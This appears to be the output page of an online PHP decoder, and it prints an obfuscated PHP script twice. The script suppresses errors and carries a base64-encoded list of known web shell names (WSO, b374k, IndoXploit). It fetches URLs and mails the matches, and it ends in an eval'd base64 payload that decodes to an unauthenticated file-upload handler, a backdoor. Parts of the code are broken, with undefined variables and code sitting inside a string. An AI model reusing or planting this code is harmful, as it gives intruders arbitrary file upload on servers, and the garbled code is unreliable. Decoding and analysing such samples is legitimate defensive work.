Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php error_reporting(0);set_time_limit(0);date_default_timezone_set(base64_decode('QXNpYS..

Decoded Output download

<?php error_reporting(0);set_time_limit(0);date_default_timezone_set(base64_decode('QXNpYS9KYWthcnRh'));error_reporting(0);$c0=$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')];$l1=$_SERVER[base64_decode('SFRUUF9IT1NU')];$b2=isset($_REQUEST[base64_decode('c2Jt')]);$p5=preg_match_all(base64_decode('JV4oKGh0dHA6Ly8pfChodHRwczovLykpJQ=='),$z4);if($p5):$d6=$z4;else:$d6=base64_decode('aHR0cDovLw==').$z4;endif;$x7=[base64_decode('cHVibGljX2h0bWw='),base64_decode('d3d3'),base64_decode('R0lGODlh'),base64_decode('UGFzc3dvcmQ='),base64_decode('U3VibWl0'),base64_decode('VXBsb2Fk'),base64_decode('RGlzYWJsZSBGdW5jdGlvbg=='),base64_decode('U2hlbGw='),base64_decode('V1NP'),base64_decode('YjM3NGs='),base64_decode('UHJpdjg='),base64_decode('VG9vbA=='),base64_decode('SW5kb1hwbG9pdA=='),base64_decode('S2Vpc2F0c3U='),base64_decode('U01QIFN1bg=='),base64_decode('U01QIE1vbg=='),base64_decode('U01QIFR1ZQ=='),base64_decode('U01QIFdlZA=='),base64_decode('U01QIFRodQ=='),base64_decode('U01QIEZyaQ=='),base64_decode('U01QIFNhdA=='),base64_decode('U2FmZSBtb2Rl'),base64_decode('U3ltbGluaw=='),base64_decode('V2luZG93cw=='),base64_decode('TGludXg='),base64_decode('QlNE'),base64_decode('VVRD')];$l8=base64_decode('Lyg=').implode(base64_decode('fA=='),$x7).base64_decode('KS9p');$i9=date(base64_decode('WS1tLWQgSDppOnM='));$ka=(strtotime($i9)*1000);$eb="$uc=fopen(base64_decode('cGhwOi8vdGVtcA=='),base64_decode('cis='));$bd=curl_init();curl_setopt($bd,CURLOPT_TIMEOUT,base64_decode('MTA='));curl_setopt($bd,CURLOPT_USERAGENT,base64_decode('TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBRdFdlYkVuZ2luZS81LjEzLjEgQ2hyb21lLzczLjAuMzY4My4xMDUgU2FmYXJpLzUzNy4zNg=='));curl_setopt($bd,CURLOPT_URL,"$z4");curl_setopt($bd,CURLOPT_HEADER,true);curl_setopt($bd,CURLOPT_RETURNTRANSFER,true);curl_setopt($bd,CURLOPT_VERBOSE,true);curl_setopt($bd,CURLOPT_STDERR,$uc);curl_setopt($bd,CURLOPT_FOLLOWLOCATION,true);$ae=curl_exec($bd);$af=curl_getinfo($bd,CURLINFO_HTTP_CODE);$u10=curl_getinfo($bd,CURLINFO_HEADER_SIZE);$u11=substr($ae,0,$u10);$o12=substr($ae,$u10);curl_close($bd);fclose($uc);if(($af==200)&&(preg_match_all("$l8",$o12))){$g13=[base64_decode('ZGF0ZQ==')=>$ka,base64_decode('dXJs')=>$d6,base64_decode('c3RhdHVz')=>1];$y14="$l1$c0
$i9

$d6";mail($k3,$eb,$g13);}else{$g13=[base64_decode('ZGF0ZQ==')=>$ka,base64_decode('dXJs')=>$d6,base64_decode('c3RhdHVz')=>0];echo json_encode($g13);}}else{?><?php eval(base64_decode("bW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VwJ11bJ3RtcF9uYW1lJ10sICcnLmJhc2VuYW1lKCAkX0ZJTEVTWyd1cCddWyduYW1lJ10pKTs="));?>

Did this file decode correctly?

Original Code

<?php error_reporting(0);set_time_limit(0);date_default_timezone_set(base64_decode('QXNpYS9KYWthcnRh'));error_reporting(0);$c0=$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')];$l1=$_SERVER[base64_decode('SFRUUF9IT1NU')];$b2=isset($_REQUEST[base64_decode('c2Jt')]);$p5=preg_match_all(base64_decode('JV4oKGh0dHA6Ly8pfChodHRwczovLykpJQ=='),$z4);if($p5):$d6=$z4;else:$d6=base64_decode('aHR0cDovLw==').$z4;endif;$x7=[base64_decode('cHVibGljX2h0bWw='),base64_decode('d3d3'),base64_decode('R0lGODlh'),base64_decode('UGFzc3dvcmQ='),base64_decode('U3VibWl0'),base64_decode('VXBsb2Fk'),base64_decode('RGlzYWJsZSBGdW5jdGlvbg=='),base64_decode('U2hlbGw='),base64_decode('V1NP'),base64_decode('YjM3NGs='),base64_decode('UHJpdjg='),base64_decode('VG9vbA=='),base64_decode('SW5kb1hwbG9pdA=='),base64_decode('S2Vpc2F0c3U='),base64_decode('U01QIFN1bg=='),base64_decode('U01QIE1vbg=='),base64_decode('U01QIFR1ZQ=='),base64_decode('U01QIFdlZA=='),base64_decode('U01QIFRodQ=='),base64_decode('U01QIEZyaQ=='),base64_decode('U01QIFNhdA=='),base64_decode('U2FmZSBtb2Rl'),base64_decode('U3ltbGluaw=='),base64_decode('V2luZG93cw=='),base64_decode('TGludXg='),base64_decode('QlNE'),base64_decode('VVRD')];$l8=base64_decode('Lyg=').implode(base64_decode('fA=='),$x7).base64_decode('KS9p');$i9=date(base64_decode('WS1tLWQgSDppOnM='));$ka=(strtotime($i9)*1000);$eb="$uc=fopen(base64_decode('cGhwOi8vdGVtcA=='),base64_decode('cis='));$bd=curl_init();curl_setopt($bd,CURLOPT_TIMEOUT,base64_decode('MTA='));curl_setopt($bd,CURLOPT_USERAGENT,base64_decode('TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBRdFdlYkVuZ2luZS81LjEzLjEgQ2hyb21lLzczLjAuMzY4My4xMDUgU2FmYXJpLzUzNy4zNg=='));curl_setopt($bd,CURLOPT_URL,"$z4");curl_setopt($bd,CURLOPT_HEADER,true);curl_setopt($bd,CURLOPT_RETURNTRANSFER,true);curl_setopt($bd,CURLOPT_VERBOSE,true);curl_setopt($bd,CURLOPT_STDERR,$uc);curl_setopt($bd,CURLOPT_FOLLOWLOCATION,true);$ae=curl_exec($bd);$af=curl_getinfo($bd,CURLINFO_HTTP_CODE);$u10=curl_getinfo($bd,CURLINFO_HEADER_SIZE);$u11=substr($ae,0,$u10);$o12=substr($ae,$u10);curl_close($bd);fclose($uc);if(($af==200)&&(preg_match_all("$l8",$o12))){$g13=[base64_decode('ZGF0ZQ==')=>$ka,base64_decode('dXJs')=>$d6,base64_decode('c3RhdHVz')=>1];$y14="$l1$c0\n$i9\n\n$d6";mail($k3,$eb,$g13);}else{$g13=[base64_decode('ZGF0ZQ==')=>$ka,base64_decode('dXJs')=>$d6,base64_decode('c3RhdHVz')=>0];echo json_encode($g13);}}else{?><?php eval(base64_decode("bW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VwJ11bJ3RtcF9uYW1lJ10sICcnLmJhc2VuYW1lKCAkX0ZJTEVTWyd1cCddWyduYW1lJ10pKTs="));?>

Function Calls

None

Variables

None

Stats

MD5	2f39240223607803374544f5e47b35d5
Eval Count	0
Decode Time	43 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats